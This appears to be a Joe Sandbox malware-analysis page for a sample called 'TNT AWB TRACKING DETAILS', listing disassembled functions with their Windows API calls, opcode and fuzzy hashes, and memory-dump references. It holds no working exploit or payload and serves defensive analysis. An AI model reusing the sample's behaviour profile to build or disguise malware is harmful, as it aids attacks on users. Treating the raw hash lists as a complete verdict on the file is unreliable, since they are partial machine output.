Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9d1fe399aefde8bd9320361ada47ddfc1019028904899cc3a966ca9452c59cad
Instruction ID: ec5962f3e5e9dc2d4629d7025a6cc91fd7c6d3a2dc10f8a540eed0e414adc353
Opcode Fuzzy Hash: 9d1fe399aefde8bd9320361ada47ddfc1019028904899cc3a966ca9452c59cad
Instruction Fuzzy Hash: E5417335504116FBDF259F68C844BE9BBB5FB06360F204356F829972D0CB34A960DFA1

Function 00AF63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00AF6433
TranslateMessage.USER32(?), ref: 00AF645C
DispatchMessageW.USER32(?), ref: 00AF6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF6475

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: ed486e6e4c82c2697a42c0991915de50ae3ceb5dcf69b59211f948c024945bda
Instruction ID: 9adb05248a8ed0d49c5f1397a97596152be033ed1480a347dc302f63ca3fccb7
Opcode Fuzzy Hash: ed486e6e4c82c2697a42c0991915de50ae3ceb5dcf69b59211f948c024945bda
Instruction Fuzzy Hash: 8B31C27190064AAFDB35DFF0CD44BB6BBB8AB01301F140275F621C71A0EB699899EB60

Function 00AF8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AF8A30
PostMessageW.USER32(?,00000201,00000001), ref: 00AF8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AF8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00AF8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AF8AF8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
Instruction ID: f4eef4f08d6f1e518d5ac2601413c345c39497f2147a1a747ca7c0dd18cc8adb
Opcode Fuzzy Hash: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
Instruction Fuzzy Hash: 4231C07150021DEBDF14DFA8DD4DAAE3BB5EB04315F11822AFA25EB2D0CBB49914DB90

Function 00AFB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AFB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AFB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AFB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AFB27F
_wcsstr.LIBCMT ref: 00AFB289

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 339f2c51f31545e723121f6a05aa32159311ec3d36bce1b4c6521397fde5dced
Instruction ID: 84b6596014b4a69d2cd618cf2fe48599a76a301fdd393fdd8cfd9c2f89ab7fc1
Opcode Fuzzy Hash: 339f2c51f31545e723121f6a05aa32159311ec3d36bce1b4c6521397fde5dced
Instruction Fuzzy Hash: 0621D332214205AAEB255BB5DC09EBF7BBCDB49750F00813DF905DA1A1EF619C419260

Function 00B2B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetWindowLongW.USER32(?,000000F0), ref: 00B2B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B2B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B2B1CF
GetSystemMetrics.USER32(00000004), ref: 00B2B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B10E90,00000000), ref: 00B2B216

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 5f822dcb0f51a938cdfd28b1aee163c9f2c9edb27dce902ae61cb7b1e1770b57
Instruction ID: 6993a0527add4ff7e335febccaafca33e4a61909e27893689ae71c407912f3e6
Opcode Fuzzy Hash: 5f822dcb0f51a938cdfd28b1aee163c9f2c9edb27dce902ae61cb7b1e1770b57
Instruction Fuzzy Hash: A3218071920262EFCB209F38AC54E6A3BE4EB15721F104778F93AD71E0DB3098219B90

Function 00AF9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9320

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9352
__itow.LIBCMT ref: 00AF936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9392
__itow.LIBCMT ref: 00AF93A3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: a9a6f4f3b9959492f603066c4bb45130975112ad1e7412bb7f5a7bbd3cfda6b5
Instruction ID: 8c9b96b8581f3c30e456ce306288492e032c51bfe889df004647fc2e58c2ea87
Opcode Fuzzy Hash: a9a6f4f3b9959492f603066c4bb45130975112ad1e7412bb7f5a7bbd3cfda6b5
Instruction Fuzzy Hash: 1221F53170020CABDB219BA49D85FFF3BB9EB49710F044029FA45DB1D1DAB0CD4597A1

Function 00B15A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B15A6E
GetForegroundWindow.USER32 ref: 00B15A85
GetDC.USER32(00000000), ref: 00B15AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00B15ACD
ReleaseDC.USER32(00000000,00000003), ref: 00B15B08

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 09be97bfeeec02044ccf4d5ef7e58f27a1e7bbb9e16435eefeb6a64e3dc1b911
Instruction ID: de5fa816dccd7f089b8a16bd79d63221994e033f1bde367b98103e7398bc760e
Opcode Fuzzy Hash: 09be97bfeeec02044ccf4d5ef7e58f27a1e7bbb9e16435eefeb6a64e3dc1b911
Instruction Fuzzy Hash: 39218135A00104AFD724EF65DD84AAABBF9EF49351F5484B9F84997362CF30AD41CB90

Function 00AA12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
SelectObject.GDI32(?,00000000), ref: 00AA135C
BeginPath.GDI32(?), ref: 00AA1373
SelectObject.GDI32(?,00000000), ref: 00AA139C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8fad70324c9a629f053165abe02b31c87845e51d78ee5e628655f24163d37dcc
Instruction ID: 45205afcb4b056bbfcd220026ace298bf8d7367435dcc35660cd2db4ee9791f4
Opcode Fuzzy Hash: 8fad70324c9a629f053165abe02b31c87845e51d78ee5e628655f24163d37dcc
Instruction Fuzzy Hash: A1213E30800609EBDF219F25DD4476D7BB9EB01721F148226E8519B9F0DBB599A2DFA0

Function 00AFBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00AFBCB3
_memcmp.LIBCMT ref: 00AFBCD1
_memcmp.LIBCMT ref: 00AFBCE4
_memcmp.LIBCMT ref: 00AFBCFC
_memcmp.LIBCMT ref: 00AFBD14

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e97894b97bbd97ff1c873826ac30c0a396d1ed210b5c1ed620c3b85e9e030ac7
Instruction ID: 12125696cdf5ee2d2e4526baa3d3009077011b1e084852102f50f842ede7255d
Opcode Fuzzy Hash: e97894b97bbd97ff1c873826ac30c0a396d1ed210b5c1ed620c3b85e9e030ac7
Instruction Fuzzy Hash: 940192F171010D7BE2086B51EE42FBBB3BCDE15788F144025FE1596243EB60EE1182B1

Function 00B04A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B04ABA
__beginthreadex.LIBCMT ref: 00B04AD8
MessageBoxW.USER32(?,?,?,?), ref: 00B04AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B04B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B04B0A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 388c2bf41facd72be6fc744fd388e3a1b3c8403dabf2b46b09f34f2c6e70db40
Instruction ID: ce833ceceb934278f607b6eacdeef119433d321ae5b52fa82ec084756f5201ee
Opcode Fuzzy Hash: 388c2bf41facd72be6fc744fd388e3a1b3c8403dabf2b46b09f34f2c6e70db40
Instruction Fuzzy Hash: 981108B6904605BBC7219FA8DC04BAB7FECEB45325F1442A9F914D32E0DBB5C9108BA0

Function 00AF8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF821E
GetLastError.KERNEL32(?,00AF7CE2,?,?,?), ref: 00AF8228
GetProcessHeap.KERNEL32(00000008,?,?,00AF7CE2,?,?,?), ref: 00AF8237
HeapAlloc.KERNEL32(00000000,?,00AF7CE2,?,?,?), ref: 00AF823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8255

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
Instruction ID: d339d641783d64f23ddfb3e6b9e782dbe81133cb6324208f545b986bc42c60f9
Opcode Fuzzy Hash: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
Instruction Fuzzy Hash: C9014671600209AFDB204FA6DC48DBB7BBCEF9A795B500439FA19D3220DF359C11CA60

Function 00AF710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?,?,00AF7455), ref: 00AF7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?), ref: 00AF7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF716C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
Instruction ID: 2df859604991186b2453428ea3a13c959b30c2e0229c26b5c16ba5a34279e007
Opcode Fuzzy Hash: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
Instruction Fuzzy Hash: 66017C72601209ABDB218FA4DC44ABEBBBDEB44791F140274FE04D7220DB31DD569BA0

Function 00B05244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B0526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 65f3708bd05aafba85485e434a446395f6130f135b0b0f6d539423dae72cf56e
Instruction ID: 6077724f5e167d7aca4d1cb70a796d4ce181a1a794ea48a03fad7d2590f15038
Opcode Fuzzy Hash: 65f3708bd05aafba85485e434a446395f6130f135b0b0f6d539423dae72cf56e
Instruction Fuzzy Hash: 95013931D01A1ADBDF20AFA4E8485EEBBB8FF09711F4000AAE941B2580CF3055618BA1

Function 00AF810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8157

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
Instruction ID: bc32790c2dbcbb853c60ff46aa16fe48c4272855647f60ca54359d93fced771c
Opcode Fuzzy Hash: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
Instruction Fuzzy Hash: B9F04F71200309AFEB210FA5EC88E773BBCEF49B55B000235FB45D7150CF659952DA64

Function 00AFC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00AFC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00AFC20E
MessageBeep.USER32(00000000), ref: 00AFC226
KillTimer.USER32(?,0000040A), ref: 00AFC242
EndDialog.USER32(?,00000001), ref: 00AFC25C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 0cef186fb778bcbd4cb4f6447a6831a303201104e865341e74629235bd7ba20f
Instruction ID: fa2a5612cff0495e841e3b0cc9f49989e9036d22ae733d4066dde5629d0d1ebf
Opcode Fuzzy Hash: 0cef186fb778bcbd4cb4f6447a6831a303201104e865341e74629235bd7ba20f
Instruction Fuzzy Hash: 1F01A73040430D97EB316B91DE4EFF67778FB00B05F00026DB642A24E1DBE46949DB50

Function 00AA13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00AA13BF
StrokeAndFillPath.GDI32(?,?,00ADB888,00000000,?), ref: 00AA13DB
SelectObject.GDI32(?,00000000), ref: 00AA13EE
DeleteObject.GDI32 ref: 00AA1401
StrokePath.GDI32(?), ref: 00AA141C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 971aedf1e1a670b47750f1f9401bbe8289086c767122c079acb2080a1a582152
Instruction ID: 9f243532574bd81ae53287c8aec4c4a4e954a5265a9ff54bf109813dcb457ec6
Opcode Fuzzy Hash: 971aedf1e1a670b47750f1f9401bbe8289086c767122c079acb2080a1a582152
Instruction Fuzzy Hash: EFF0CD30004609EBDB315F1AED4CB693BB5A742326F088235E4694B4F1CB7945A6DF50

Function 00B0C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B0C432
CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0C44A

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

CoUninitialize.OLE32 ref: 00B0C6B7

Strings

.lnk, xrefs: 00B0C3C6, 00B0C3EE, 00B0C3F8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 316ee330962edd0c8983e550d8f3a4ba8afc3435a0ec8f69374ad2865bd3f25c
Instruction ID: d165feb5b6545241653e2b6e249104ce594810bccd68c90bfc4566d7f7aab864
Opcode Fuzzy Hash: 316ee330962edd0c8983e550d8f3a4ba8afc3435a0ec8f69374ad2865bd3f25c
Instruction Fuzzy Hash: C9A13971504205AFD700EF64C981EAFB7E8EF8A354F00496CF1559B1E2EB71EA49CB62

